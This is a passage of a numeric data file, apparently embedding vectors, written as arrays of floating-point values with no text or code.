786,-0.009381783,-0.021107512,0.0074834293,0.011043376,-0.0039091003,0.017222771,0.03213584,-0.0362193,-0.044883907,0.014133206,0.03584831,0.0010664844,-0.03002673,-0.0661704,-0.01228694,-0.017520947,-0.034591414,0.0053797006,-0.011976446,-0.017845822,0.009432739,0.0022497158,0.011958785,0.006096599,0.033163946,-0.029511705,-0.0069205323,0.05949651,-0.023212187,0.010079816,-0.017444042,0.013514762,0.010816267,-0.013465052,0.037673265,-0.005668372,0.010768688,-0.057338286,-0.042245336,0.007728193,-0.025073875,0.033001363,0.036197092,0.028178139,-0.05327139,-0.025425777,0.004044693,0.03030581,0.003276368,-0.017851306,-0.070805654,-0.012521599,0.014498249,0.004815036,0.031143915,-0.06322291,0.01613099,0.018924614,-0.01730091,-0.03038784,-0.031628706,0.037648074,-0.008137425,-0.016563984,0.037292924,-0.03407819,-0.06034606,-0.037359767,-0.051262464,-0.008477021,0.00611453,0.021782305,-0.012306634,-0.025690885,-0.012413858,0.046031773,-0.003822232,-0.049515564,0.008972757,-0.0043552252,-0.012096843,-0.006065082,-0.0024543765,-0.026864301,-0.022483338,0.02685243,0.09177964,0.020471599,0.027881607,-0.008887267,0.10806067,-0.021091366,-0.055153944,-0.015120553,-0.0030085829,-0.024212139],[0.00052077754,0.032582738,-0.124715485,-0.09683328,0.055505704,-0.061237466,0.006205189,0.027970988,-0.0071502575,-0.037887145,-0.018853402,0.03471574,0.03823678,0.05718591,0.010698998,-0.007827028,-0.006836545,-0.03918207,-0.0076999264,0.02307517,-0.011088185,0.0327097,0.013010428,-0.05032708,0.011634618,0.05286718,-0.021479744,-0.056875102,-0.06516905,0.012620435,0.06244106,-0.01615988,-0.021346971,-0.010901544,-0.09664649,-0.055406015,0.03129648,0.041807707,-0.0119763445,0.016325807,0.05620089,0.03860181,-0.0066258623,-0.0656936,-0.017618159,-0.070117906,0.10176025,-0.00091757823,0.059900995,-0.05546369,0.024821572,-0.017624147,0.018851174,0.017322779,0.08784015,0.043235734,0.008636732,0.028159607,0.019087357,-0.029680146,0.09740846,0.03521759,-0.10640399,0.083167866,0.0041456693,-0.015210274,-0.05777912,0.048379015,0.010403705,-0.0105533805,0.028340269,-0.015086064,-0.045895644,0.06173912,-0.045651596,-0.006780998,-0.01645975,-0.0042104134,0.019231748,0.05102921,0.0641927,-0.008687775,0.06154095,-0.0005532621,-0.0061786715,-0.0053787115,-0.03399534,0.015990427,-0.009728428,0.0836701,0.0029812756,-0.036583122,-0.0033512062,0.037591074,-0.04007012,0.029765623,0.0046675997,-0.01566497,0.022565905,-0.007836683,-0.054512955,0.01651131,0.00023968061,-0.028290622,0.03288726,0.028561424,0.024158353,-0.019073533,-0.017324435,-0.011597709,-0.032334574,0.07306419,-0.008846706,-0.0006003564,-0.041543424,-0.07407991,0.035006043,-0.030976065,0.017748805,-0.006261854,-0.004391555,-0.029273491,-0.013404952,0.04273519,-0.021057725,0.035965048,-0.027942827,0.016029004,-0.011216707,-0.05274784,-0.045693107,-0.003162892,0.00949551,0.028203286,0.03659255,0.04023694,-0.03451078,0.0021921946,0.017504992,0.004008295,0.039043445,0.049324717,-0.03421939,-0.023594366,-0.004833412,-0.06867187,-0.011950652,-0.034254104,-0.052576017,0.05128481,0.0035763541,0.008935384,-0.020746237,0.018447984,0.021097343,-0.009829276,0.015619538,-0.018357325,-0.004051522,0.010032346,0.057750195,0.007918309,-0.044176973,0.045776878,0.024115926,-0.06566345,0.034822986,-0.016008727,-0.018421099,0.0007183174,-0.079103835,-0.011986767,-0.015211556,0.002108066,0.0398643,0.053165138,0.048811473,-0.040361017,0.009612023,-0.031780474,0.046167742,-0.06677619,0.038824376,0.047836058,-0.0359433,0.0026816602,0.0045721647,-0.023315147,0.007443247,-0.03015408,-0.0017448039,0.009894001,-0.03752233,-0.029321257,-0.058831673,-0.061367843,0.007518932,-0.027412202,0.03307493,-0.016064059,-0.09356823,-0.02245443,-0.0645643,0.027308838,0.0009179486,0.05344127,0.0056061917,0.00832525,-0.061416224,0.052902464,0.08294283,-0.0066066077,-0.0026597618,0.007266972,-0.0064832214,-0.0049091987,-0.0044377674,0.022113895,-0.02647927,0.004123381,-0.02245109,-0.0039395983,0.027796974,0.04046375,0.019935144,-0.006462529,-0.0065769986,0.011287878,-0.04730929,-0.013313867,0.026512114,-0.078608274,0.06207092,-0.017588347,0.032619625,0.014925624,0.03288658,0.0015515883,0.0021138208,0.023205878,0.009411892,0.024382222,0.004369049,-0.00029132597,-0.04603869,-0.048120413,0.02471597,-0.054448526,-0.04232286,0.07779127,-0.0053289165,0.016406583,0.025548685,-0.029802116,0.053126305,0.016742758,-0.0050145653,0.026013553,0.012179675,-0.0120251,0.024922732,-0.039729178,-0.028845446,-0.031200362,-0.03417111,-0.07712386,-0.016992934,-0.014976056,0.032291953,-0.004158483,0.01096826,0.058285985,-0.001303562,-0.028008537,-0.004240406,0.052182276,-0.032915644,0.005808289,0.008475714,0.016688993,-0.011511104,0.023343997,-0.0058253338,-0.0068553337,0.014621906,0.018367726,-0.0023218994,0.006390925,0.035926823,-0.010685998,0.01163609,0.016522514,0.0032843219,0.028803805,0.006768072,0.024016714,0.03602699,0.013402546,-0.0013652073,-0.016633898,0.03699156,0.0635474,0.05698356,0.024245106,-0.021621792,-0.0049448125,-0.04069771,-0.028179163,0.051923245,-0.05950889,-0.051896464,-0.009750507,-0.031223236,-0.012197843,-0.03012406,0.0353651,0.026511392,0.03216973,0.050127152,-0.008866728,-0.00074018654,-0.059403397,0.0003977374,-0.0380298,-0.010886504,0.07606242,-0.01644863,-0.016936908,-0.024631543,0.021241141,0.03950491,0.023362348,0.07384413,-0.007121947,-0.033029605,-0.03571007,0.02862885,0.0022241673,-0.020188717,0.010557413,0.056787938,0.016995387,0.083632156,-0.024411121,-0.008918148,0.015501412,-0.05920712,-0.026922794,0.04365242,0.024923328,-0.05730209,-0.014055419,-0.038999606,0.0020205802,0.033039592,0.02515907,0.051205073,0.022922464,-0.030140901,0.0066896994,0.041288875,0.010793576,0.025396228,-0.035063602,0.0022037928,0.004931912,0.055884406,0.014567086,0.0079235835,-0.013868921,-0.00048771477,-0.052604415,-0.017979352,0.047796484,0.005456376,0.0060092253,-0.029074583,0.015564686,0.0035279759,0.0017244101,-0.004946808,-0.023344915,0.0025726503,0.027449628,0.00043250772,-0.025695218,0.030801587,-0.023407029,-0.017499644,0.04181291,-0.026429616,-0.0016572402,-0.036784496,-0.019997755,0.026928097,-0.02788286,0.036478356,0.03372359,-0.022689316,0.058945034,-0.034963775,-0.05147157,-0.02672617,0.02423258,0.022221379,-0.01158395,-0.0747916,-0.019689718,0.029040903,0.023970414,0.031288035,0.03464334,-0.007946033,-0.007049023,0.002979419,-0.010834938,0.049541384,-0.0032819915,-0.018669637,0.005826467,0.03290285,0.043076493,0.00073379517,0.012632217,0.018422704,-0.008669339,0.016650217,0.020326968,0.007670895,-0.0297746,0.058534354,-0.0030240861,0.04843048,-0.03733634,-0.031015879,0.022807527,-0.030712366,0.020072002,-0.003282807,0.027748827,-0.0023582715,-0.037565324,-0.02540284,-0.029633714,0.041251875,0.053708807,0.03731558,-0.008052518,-0.036781646,0.013257752,-0.046664517,0.03650242,0.018609876,-0.024492936,0.14334452,0.005441114,0.027705701,-0.00064306415,0.03826573,0.03720576,0.012432083,0.029308211,-0.028796116,0.03342972,0.01394587,-0.025167601,-0.00029714213,-0.038360815,0.035500072,0.083421245,-0.058499258,0.012979244,0.013433444,-0.059167903,-0.02545359,0.048621655,-0.008614744,-0.018429523,0.0026935046,0.04399516,0.02769055,-0.039390683,-0.031487197,-0.061403602,-0.049512323,0.05672366,0.028494425,-0.011869423,-0.0301387,-0.013243863,0.028202558,-0.018388635,-0.02622445,-0.03215448,-0.06756585,-0.03351062,-0.021458384,0.053307433,0.048272155,0.003997505,0.026510222,0.047953986,0.051434513,-0.004156722,-0.027998772,-0.03797368,0.06976212,-0.055685535,-0.06934884,0.030977894,-0.009421361,0.046992444,-0.024937456,0.026511453,0.04304187,-0.05247256,0.019069001,0.026992775,-0.062993266,0.008512516,0.020718465,-0.03523435,-0.012123244,-0.012615686,-0.05933908,0.00031750364,-0.010605852,-0.0904009,0.016838482,0.003520412,0.014287215,0.000108749264,-0.008549038,0.00708164,0.09448583,-0.014084701,-0.035460476,0.0069579887,0.035351418,0.011946387,0.0152924955,0.007329819,0.00867719,-0.029805494,0.0039307317,-0.028854419,0.0055238064,0.04667674,-0.02810274,-0.06652442,0.009217509,-0.04205536,0.027606566,-0.040405218,-0.0013002141,-0.04893902,0.028843006,-0.04703967,-0.022080459,-0.034543585,-0.06892859,-0.014811433,0.044732958,0.04492052,-0.025662992,-0.022918517,-0.04964657,-0.022653235,-0.0037479328,0.06421403,0.025820812,-0.054748446,0.04740206,0.05147621,-0.0251351,-0.028348533,0.032667376,0.010362627,-0.02526136,-0.035249554,0.017261095,-0.06354665,0.006230403,0.034224678,-0.032132845,-0.018091029,-0.028513845,0.005645611,-0.012163841,0.007736798,-0.003679775,-0.023028964,0.052721117,-0.047960058,0.014477509,0.0024601426,0.02369055,-0.00842066,-0.054511514,-0.06396768,0.044337075,0.02452658,0.09308006,-0.0031735902,0.041456293,0.09844398,-0.038367696,0.028809017,-0.03885852,-0.018341098,-0.018631728,0.032801393,0.030096373,-0.010674926,0.07256408,-0.0040948135,0.047921453,0.037436955,-0.0044210088,-0.009062028,0.007268376,-0.032069307,0.043577448,-0.04762806,0.0038720537,0.0030116027,-0.007109267,-0.061856315,0.0069726165,0.03397745,-0.014338583,0.012883475,-0.009561374,-0.024917364,-0.070246935,0.054115877,-0.023758493,0.02027979,-0.02103731,0.068520285,0.015463675,-0.008535848,-0.0342284,0.047828536,0.016259255,0.000049896164,0.019041386,0.05136968,0.024739774,-0.0098698065,0.07296691,0.07434426,0.04661524,-0.006848406,-0.003039072,-0.009784149,0.034155264,-0.016009318,-0.06265422,-0.021367028,-0.00058924063,-0.021015802,-0.040548597,0.030893676,-0.016599499,-0.029436033,-0.011084516,-0.030985553,-0.0020433941,-0.015394847,0.036926992,-0.025326896,0.03237414,-0.072717056,0.024307845,0.022974223,0.007782739,-0.01450503,-0.006063599,-0.012894371,0.00046641892,0.004657903,0.044549413,-0.04202744,-0.001940412,-0.028911967,0.012701653,-0.007893863,-0.029867265,-0.019743958,-0.075089835,-0.04558486,0.000546244,-0.03525871,0.006697819,0.008477468,0.02008187,-0.019752786,0.009489435,0.073639065,-0.0065824795,0.033296257,0.017052872,0.0024807886,-0.007814858,-0.0022296216,0.022311423,-0.024423862,-0.021829044,-0.05740444,-0.029894484,0.038822986,-0.026288616,0.058185194,0.00057400274,-0.031773705,-0.016105488,-0.03406356,-0.014264952,0.041038733,-0.015384412,-0.013951561,-0.037357472,0.0045479913,-0.009321978,-0.019097812,0.07452485,-0.028877914,0.021421164,-0.021018263,-0.029041646,-0.0501278,-0.046296,0.060095217,0.048470933,0.04935008,-0.021659337,-0.01823757,-0.08112853,-0.0377904,-0.06595898,0.0059958217,0.009760655,-0.018513994,-0.03002313,-0.04191481,-0.019912537,0.051640302,0.015082124,-0.02768531,-0.00037087442,-0.04446098,0.017140295,-0.0021673532,-0.027610395,0.022920482,-0.03772518,0.035785954,0.12820551,-0.0022795468,0.019911952,0.019577302,0.02463238,-0.023970991,0.004248819,0.006956086,-0.04683672,-0.029824529],[0.02285258,0.046512965,-0.18378665,-0.035187833,0.066305265,0.018435637,0.054201487,0.018346965,-0.012759127,-0.046065193,-0.04310558,0.03992444,0.09842389,0.029582415,0.0035135385,-0.030509364,0.029645717,-0.044268977,-0.033967394,0.05471666,-0.008317009,-0.036896057,-0.024364937,-0.03273345,0.010700307,0.012304896,-0.05133042,-0.037297823,-0.0044386834,-0.0043095634,0.030481614,-0.043260876,-0.032583803,-0.026477247,-0.103323735,0.018787192,0.072479025,-0.0069473144,0.03613029,0.017290791,0.008554603,0.01335292,0.028426126,-0.025415713,0.017066732,0.03885528,0.064430416,0.06275591,0.017186021,-0.044321563,0.029081728,-0.017614827,0.010551791,0.044422623,0.058014363,0.03341508,-0.035984516,-0.009362782,0.03850658,-0.1129732,0.080190144,0.011026671,-0.11696177,0.029229835,0.0001722515,-0.02489207,-0.037599474,0.047090467,0.003340331,-0.04087256,0.04186101,0.021430507,-0.035607595,-0.011615371,-0.044473957,-0.0008683679,0.009972274,-0.011612512,-0.022818275,0.039135166,-0.011854445,0.028557276,0.08647722,-0.0025257186,0.05496158,0.023742136,0.013820358,0.011641312,-0.06024523,0.12710844,0.0062875566,-0.021909464,0.045719758,0.014934857,-0.07044599,0.0043560113,-0.058805928,0.0025268267,-0.019203655,-0.024283048,-0.015433866,-0.004912007,-0.009132456,-0.045453902,-0.02708652,0.046897966,0.033091463,0.008921215,-0.021190774,0.004821995,-0.037234996,0.020912243,-0.02844441,-0.0144131975,-0.0666746,-0.016607206,0.04318677,-0.0049888613,-0.016360803,0.017125487,-0.025150664,-0.02072759,-0.0013773702,0.02029598,0.0083188135,0.07503156,-0.04429732,0.029449208,-0.004151246,-0.030973058,-0.023315394,-0.007016266,-0.04889809,0.028725792,0.030669905,0.0758239,-0.04952841,-0.0078494325,0.031804968,0.050813977,0.028855167,0.024281694,-0.006021638,-0.04290358,-0.010394034,0.016863782,0.02069397,-0.007882294,-0.062943734,0.022425972,-0.02000232,0.021138435,-0.053065788,0.0071293702,0.034660585,-0.022854518,0.013305193,0.0013994102,0.019808793,0.0010662732,0.056055896,-0.006790762,-0.028452912,0.028006915,0.011068284,-0.036897287,0.00788547,0.042304374,-0.0013196655,0.0024211088,-0.0552121,-0.040205833,-0.0076318677,-0.014749705,-0.003748488,0.0064309845,0.08379516,-0.05425017,-0.010687266,0.009775357,0.018521031,-0.008375039,0.04301022,-0.014830073,0.011422174,-0.0060225287,0.012665191,0.031474542,-0.01961209,-0.058009397,0.04381487,0.022348296,-0.06818989,-0.009604895,-0.04527947,-0.051127713,0.044491116,-0.012780384,0.03984025,-0.024223905,-0.040079482,-0.03736089,-0.017367397,0.014043643,-0.023436354,0.02002951,-0.005977498,0.039242182,-0.005938703,0.008791697,0.08530963,-0.028831497,-0.0033394461,0.028635025,0.030048233,-0.021277418,0.0037787862,-0.004507322,-0.012144068,0.0017131632,-0.028882632,-0.034988206,-0.009374143,-0.0014691642,-0.01719456,0.011294542,-0.02921724,-0.018217213,-0.04381951,0.004835868,-0.0023415543,-0.056494232,0.029160503,0.0044508693,0.02072264,0.0125083225,-0.005465066,0.030839432,0.0072004795,0.022319207,-0.0079110535,0.018955354,-0.040951885,0.015789438,-0.029579792,-0.009691522,0.013636131,-0.04655253,-0.018069766,0.034602,-0.013343381,0.07452094,0.056476343,-0.03235999,0.029664114,0.01496477,-0.027786119,-0.017166657,0.020468084,0.035774987,-0.0076961517,-0.014806945,-0.012860041,-0.006941767,-0.021346051,-0.016309088,0.02741921,0.010219186,0.0039489875,0.0017815577,0.0065749595,0.04070911,0.017960126,0.08474093,0.036173917,0.032304894,-0.022327514,-0.029022112,-0.0131028695,0.014974225,0.0031693764,-0.062980354,-0.045701247,0.0093945665,0.011677062,0.0025743304,0.009648288,-0.026669612,0.021318117,0.014670251,0.0019705158,0.0033844917,0.0032940381,0.038626578,0.0037864612,0.027707387,0.02981159,0.011629177,-0.004348236,-0.04335653,-0.00066397927,0.056795947,0.039554242,0.04245442,0.0013867894,0.028572025,-0.016402602,0.01052086,0.01586943,-0.04854546,-0.05060253,-0.004893501,-0.080672435,-0.023030449,-0.03380727,0.002347741,0.040011115,0.026883218,0.041893564,-0.05594273,0.030510794,-0.016380321,-0.00024607856,-0.04265511,0.012077289,0.0872727,0.00023795018,0.022016896,-0.016066272,-0.022839485,0.056753315,0.010418108,0.038537443,-0.032263897,-0.063810624,-0.03261121,0.008648707,0.034768537,0.005782861,0.045975074,0.036120232,-0.034121875,-0.007118635,-0.025715698,-0.019903705,0.027799899,-0.049771693,-0.02069481,0.025992913,0.025899347,0.004868103,0.0065938565,-0.0051808073,-0.010475081,0.04050758,0.043003913,0.049991656,0.026258338,0.024755908,-0.0034846594,0.030195246,-0.03675861,-0.00710492,-0.025859231,-0.017861798,-0.024244975,0.059204705,-0.016594646,0.013758053,0.0030136188,-0.016514493,-0.04102163,-0.022686541,0.004036036,0.008992872,0.012347919,-0.03378081,0.037345637,-0.011366234,-0.0014815595,0.018319631,-0.0057260287,-0.024421955,-0.029261703,0.047477372,0.016169587,0.02616561,-0.04322893,0.0195732,0.045613702,-0.008910375,-0.049337532,-0.025061442,0.025432661,0.034884512,-0.038310617,0.04410621,0.013285089,-0.0012800841,0.043097403,-0.07164992,-0.040577926,0.029267143,0.008077642,0.022571092,0.033892132,-0.052769445,-0.041468468,0.031535164,-0.017040012,0.02864458,-0.011234323,-0.07110193,-0.08229781,-0.004648062,0.002342668,0.038551375,0.019937374,-0.041266713,-0.008143729,0.034589887,0.028941654,0.028988611,0.018395353,0.010542064,0.03268249,0.040236253,0.04259738,0.02707254,-0.083242305,0.06662104,-0.004922441,0.04114135,-0.0040026335,0.009858842,-0.0031603505,0.028141508,0.059268378,-0.0072231623,0.037110582,0.03532491,-0.054170325,-0.06251256,-0.03481588,0.0343696,0.047708698,0.06465287,-0.024458664,-0.033411928,0.027437301,-0.009746376,0.0134927565,0.084857844,-0.0037903818,0.12613127,-0.0085746,-0.015746586,-0.0022716827,0.034850236,0.010214406,0.012348949,0.03940782,-0.051000144,0.010849931,0.0032741425,-0.01183716,0.011379241,-0.027689952,0.026715916,0.054616686,-0.05760983,-0.017597338,0.05457058,-0.0126495445,-0.0025021427,0.030473929,-0.04131231,-0.0037129298,0.035630617,0.06277364,0.016032817,-0.035315573,-0.023407828,-0.04515284,-0.043858368,0.05645533,0.012189025,-0.04407185,0.046345998,-0.039438933,0.04894719,-0.003324995,0.002746304,-0.0018570205,-0.063163325,-0.024292037,-0.00705056,0.042534363,0.019499417,-0.011788297,-0.030185835,0.057395507,-0.03312148,-0.055401485,0.027763465,-0.029291445,0.06425445,-0.05540097,-0.0642595,0.033863224,0.0143558765,0.050695147,0.022610826,0.031671047,0.04807404,-0.08081314,0.006304147,0.0031769401,-0.004208767,-0.013036048,0.02343975,-0.02688717,-0.031684604,-0.0155688105,-0.076823555,-0.023740947,-0.024959749,-0.061064124,-0.0038737054,0.02297876,0.06445351,0.04867997,-0.012078275,-0.006366071,-0.036086977,0.040171713,-0.0019224543,0.028380826,-0.023827687,0.041133754,0.009946048,0.025708841,0.025449201,-0.0006321848,-0.010233876,-0.009975126,-0.03752291,0.016069526,0.006230489,-0.06490366,0.037893895,0.002461263,-0.00024317642,-0.023673784,0.008146144,-0.01182962,-0.018862426,-0.007459962,-0.0034111193,-0.019852877,-0.0125317555,-0.0064314143,0.051471677,-0.013419245,0.02219123,-0.0118388,-0.0034947803,-0.020860266,0.012936413,0.062016107,0.02888737,-0.076825075,-0.011252416,0.0082176365,-0.0074696806,-0.022324322,0.022666594,-0.022361295,-0.04957266,-0.071663484,-0.012624374,-0.0638375,0.021670375,0.024718683,-0.022596251,0.009802189,-0.051620048,0.0023243546,0.045832213,-0.046611417,-0.017543698,0.004811038,0.049100354,-0.020039795,-0.023487443,-0.011287699,0.0068197297,-0.021979807,-0.075062536,-0.08732696,-0.03020321,0.0090618925,0.054759197,-0.059585102,0.014316925,0.060852446,-0.012917809,0.02229053,0.01237481,0.010994389,0.01219384,-0.003709183,0.0069398405,0.0013225203,0.0029460464,-0.020195117,0.03693396,0.012484814,-0.024588821,-0.018424468,-0.019349271,-0.056823514,0.053696968,-0.08110382,0.002630156,-0.010090317,-0.0011942779,-0.06819516,0.042362813,0.032171767,-0.037913222,0.02535641,-0.05646175,0.015037315,-0.061087444,0.025651114,-0.042391807,0.061635703,-0.0054923655,0.015818119,0.01275795,-0.017483188,-0.038398582,0.004372175,0.014083467,-0.001382891,0.07254076,0.09000264,0.0072954646,-0.01635052,0.071587496,0.10620922,0.025040656,-0.05360041,-0.01027464,0.03089465,0.043554727,0.020567372,-0.015267627,-0.04337227,-0.033734854,-0.037745927,-0.02346667,-0.012483757,0.028388135,-0.011231151,0.0019454807,-0.029824663,-0.057832748,-0.03454857,0.04553271,0.019586822,0.00020250646,-0.022426728,0.05033971,0.005064412,0.012395964,0.02985843,-0.02774227,-0.010353183,-0.012984275,0.0020498552,0.025300447,-0.021160496,-0.0253366,-0.0045861593,0.00274108,-0.02629186,-0.026834726,-0.01868866,-0.04558206,-0.0124331005,0.0059630317,0.004968317,-0.032949153,0.048966654,0.00766819,-0.0069878073,0.017199876,0.080466144,0.022651741,0.023575233,-0.0077453554,0.0125059895,0.008514441,-0.0105039505,0.038995247,-0.026097614,-0.01267167,-0.052209344,0.023521312,-0.040406708,-0.034459222,0.06911884,-0.0153207425,0.003600483,0.0046403883,-0.058394983,-0.023967119,0.033265,0.012360814,0.009526854,-0.0043667,0.045447387,0.008716591,-0.0365701,0.024910023,-0.028516507,0.022695774,0.0059852744,-0.048170332,-0.041086864,-0.042019982,0.054677144,0.019184373,0.014490368,0.004114787,0.013345826,-0.077096574,-0.04669705,-0.048555017,0.05047015,0.031067533,0.019741954,-0.044941872,-0.0030332103,-0.022538444,0.055192742,-0.025696272,-0.023933832,-0.015035184,-0.027600892,-0.037757862,0.029759962,-0.027142338,0.0021283766,0.0426938,0.0026317781,0.13168731,-0.008030559,0.0040206346,-0.058788974,0.039550267,-0.017333109,-0.043347914,0.013965209,0.0063357763,-0.047629487],[0.026074728,0.09001472,-0.16128185,-0.05231538,0.078555934,0.01918971,0.06799608,0.03380887,0.0015683144,-0.07064826,0.018692046,0.02596332,0.108331084,0.010190022,-0.06445029,-0.059058942,-0.017627537,-0.070792444,-0.0013699308,0.053107753,-0.03405075,-0.038434554,-0.0050966907,-0.055398207,0.055968713,-0.0065539386,-0.026028272,-0.022154367,-0.02963364,0.015946155,-0.0010999935,-0.028699817,-0.016893841,0.018133426,-0.029571941,-0.0013306931,0.022415504,0.00904735,-0.046063196,0.028217152,0.091033,0.035366982,0.0040940354,-0.06258935,0.022620663,0.005731455,-0.0061265267,0.015860762,0.099708274,-0.09120848,0.04169785,-0.019673929,-0.02356821,0.028913103,0.08687956,0.020376092,-0.052437864,0.018851971,-0.011604161,-0.06634764,0.08554034,0.06109843,-0.10056974,0.08086777,0.012339871,-0.029112427,-0.054898992,0.031714123,0.063510984,-0.02656698,-0.0024978025,0.026022146,-0.016810797,0.026660958,-0.05349039,-0.01792117,-0.019073589,-0.016345683,-0.019559426,0.04698399,0.019884342,-0.019710395,0.04658675,0.028502503,0.031343494,0.01144144,-0.024723671,-0.0015442071,-0.009762377,0.086600445,0.011407222,-0.045532033,0.049042806,0.0106165465,-0.0381678,0.04995026,0.024493951,-0.005598639,-0.02422269,-0.011497759,-0.02268269,0.008726846,0.00879053,0.021841671,0.015882095,-0.023659918,-0.014088067,0.007468459,-0.03834774,-0.040818058,-0.03190077,0.029617166,-0.019675301,0.035535842,-0.023514755,0.016119268,0.08707137,-0.004430358,-0.0378943,0.024624623,-0.02849801,-0.027876114,0.019408308,0.060017567,-0.0026423659,0.037079528,-0.0548143,0.030180223,0.014628976,-0.054370876,-0.040354665,-0.023909312,-0.021699298,0.0091545945,0.0037599115,0.06720853,-0.04418198,-0.008809824,0.016382657,0.029630449,0.026779927,0.017350964,-0.04258332,-0.036744017,-0.006779457,-0.019185869,-0.018696524,-0.0038959945,0.00235807,0.029578147,0.03075791,0.040739976,-0.005877719,0.035681363,0.02955716,-0.019001866,0.013962861,0.007909072,0.00037341975,0.035377167,0.034434162,0.014871297,-0.004890648,0.06538004,0.027577363,-0.024484454,-0.03455825,0.0195029,-0.03498694,0.0548799,-0.061700437,0.017286861,0.012523347,-0.014252215,0.019533677,-0.018092938,0.05318444,-0.044502083,-0.0011520009,-0.030576246,-0.035057932,-0.025214445,0.03587831,0.0077491794,0.013171334,-0.025973814,-0.020761417,0.011312047,0.014012499,-0.06218204,0.020965312,-0.01035015,-0.09411742,-0.0145787075,-0.08165756,-0.020406323,0.02764286,0.018688558,0.034893196,-0.015907224,-0.054760337,0.003376753,-0.076575756,0.007470845,-0.039600156,0.07536229,-0.017641064,0.04656943,-0.022869086,-0.0053990674,0.06753005,-0.013566501,0.00033614825,0.019915486,-0.02320806,-0.010147251,-0.03589807,0.0021715257,-0.039625827,-0.0008802293,0.0065368013,-0.031810716,0.024223767,-0.024656836,0.0008306948,-0.018580658,-0.058151167,-0.023103628,-0.037312973,-0.0022808136,0.035514306,-0.12120403,0.029319704,0.006811793,-0.0025391425,0.06130066,-0.01990857,0.040120278,-0.012472898,0.011709375,0.01784835,0.029329529,-0.03185293,-0.034546044,-0.016807474,-0.06304651,0.01146185,-0.016576411,-0.010821221,0.008358114,-0.039209027,0.0232505,0.04135306,0.00050527166,0.03545325,-0.018681433,0.0091026835,0.0037622454,0.004072734,0.016191624,0.044815384,-0.033801083,-0.0032928176,-0.01586532,-0.015060195,-0.009576033,-0.049259942,-0.014883065,0.052236423,0.01309082,0.034722373,0.023075255,0.00085421145,0.02496689,0.023198908,0.051323682,-0.011404451,-0.013521692,-0.02149493,0.042403467,-0.03098632,-0.01790667,-0.030406453,-0.015517414,0.033958085,0.051638696,0.013024742,-0.03514633,0.004010341,-0.009677357,0.013837206,-0.028306015,-0.016731517,0.031819858,0.030465776,0.011588175,0.040272467,-0.018679472,-0.011331206,-0.033512887,0.004102897,0.035997782,0.08672592,0.04689386,0.0008800412,-0.017376358,0.011934374,0.011085189,0.045459453,-0.044934735,-0.05220861,-0.001591305,-0.010751349,0.013036546,0.0035643133,0.034948908,0.048451584,0.024573304,0.027360199,0.0004950485,0.02933782,-0.027821004,-0.009398798,-0.06546067,-0.020386484,0.07055255,-0.017191853,0.008567377,-0.022957286,0.004538213,0.032928713,0.05256978,0.020459399,-0.021441054,-0.049505956,0.016595524,0.0033659232,0.0076360344,0.039098337,0.045838226,0.042929273,0.0094358325,0.008255972,-0.047674753,-0.002057673,0.013013292,-0.025709387,-0.018087666,0.018665843,0.023256607,-0.021886766,0.024919845,-0.042251736,-0.037440766,0.026706332,0.03807618,0.012103513,0.060884345,0.04365073,-0.048340406,0.039656345,0.029447304,0.007925441,-0.04354547,-0.010485989,0.038654637,0.038412627,-0.020390062,-0.0151442215,0.012828171,-0.0076948972,-0.06276101,0.0077040014,0.03215338,-0.0070449393,0.052952126,-0.057888158,0.035093892,-0.004145341,-0.028923923,0.050245326,-0.013395427,-0.009820484,-0.033236463,0.007925595,-0.017187096,0.014600353,-0.036340594,0.0072169118,0.011101383,-0.015164702,-0.010516919,-0.03191271,0.009512408,-0.0060280995,-0.02334635,0.02472242,-0.01805266,0.0007870614,0.086029425,-0.066905685,-0.04435289,0.02685946,-0.008079832,-0.014439267,0.04842185,-0.05096979,-0.00930344,0.051218785,-0.008773714,0.027745886,-0.013030293,-0.033463944,-0.013955856,0.020577408,0.015067145,0.026633246,-0.01664516,-0.002681334,-0.019676607,0.0160973,0.040603537,0.024936568,-0.02511422,-0.015753996,0.02857176,0.031424552,0.014923924,-0.008114929,-0.021604057,0.07740222,0.013213895,0.007959955,-0.024709009,0.020603962,0.008847095,0.007368267,0.07664135,0.012918061,0.028611183,0.026733335,-0.044145312,-0.04661421,-0.06086149,-0.02351719,0.051018395,0.059842657,-0.014065112,-0.08993561,0.056333307,0.029123815,0.023187064,0.067121245,0.012315634,0.106953494,-0.04112625,-0.0047769086,-0.0008167671,0.03531792,0.033819266,-0.014127987,0.021634232,-0.06637293,0.033954047,0.038632676,-0.01644423,-0.017654596,-0.027967874,0.035947673,0.05400693,-0.025255406,0.002075817,0.013648235,-0.037911214,-0.0043414393,0.04818758,-0.029067885,-0.009581804,-0.02073448,0.04918428,-0.013761419,-0.04776533,-0.04085575,-0.036297373,0.0073065558,0.02921598,0.021020656,-0.03582402,-0.050691444,0.002201413,0.04175973,0.017429598,0.02437874,-0.0031687343,-0.049319915,-0.029596243,-0.0019100538,0.017353306,0.020163052,0.009193937,0.023994422,-0.00023951591,-0.044285007,0.01717001,0.040088423,-0.006089935,0.076827615,-0.0392879,-0.045757137,0.0003488231,0.011211466,-0.00069269846,-0.015279221,0.045768257,0.053859297,-0.03478628,0.021150662,0.07362498,-0.051951565,-0.008968738,0.003758032,-0.022522623,-0.025603106,0.036433842,-0.06298558,-0.007541807,0.00315471,-0.04502206,0.04210977,-0.0099813165,0.016214345,0.042509776,-0.055627733,0.021172587,0.034215696,-0.021309644,-0.043767657,0.019469554,0.026871312,0.035125915,-0.026369717,0.027776811,0.068611816,-0.01862174,0.015977092,-0.011124182,-0.011268366,0.009824202,-0.019607197,-0.09632101,0.030673087,-0.05925988,0.018176753,0.007888928,-0.01326908,-0.014223815,0.0020100363,0.025210937,-0.021144949,-0.029513026,-0.015382888,-0.0034692583,0.0401197,0.006414688,0.01425526,-0.0077183796,-0.00039533296,-0.027901756,-0.020949792,-0.00010947301,-0.036682602,-0.06956975,-0.03926553,-0.046924528,0.0061592725,-0.00078764325,0.0111107845,-0.012626221,-0.036965374,-0.049453195,0.014883695,-0.045269217,0.0034561998,0.025536353,-0.018960275,-0.051654503,-0.08478113,-0.021257702,-0.02581119,-0.048704058,-0.008540943,0.017581481,0.009774002,-0.020991178,0.0058559645,0.0042887907,0.0009648892,0.001149722,-0.08857809,-0.045297492,0.033392332,-0.0350806,0.046765223,-0.029768553,0.06209543,0.07848362,0.021738166,0.027042776,0.0076202555,-0.028024098,-0.014287503,0.02479938,-0.023829516,-0.0265606,-0.015464245,-0.07956375,0.023730136,-0.0049601104,0.018942418,-0.012561416,-0.0236453,-0.043089658,0.05297725,-0.0208134,0.05525859,0.0114058,-0.032351322,-0.040682275,-0.002307012,0.03279289,-0.029463923,0.04591715,-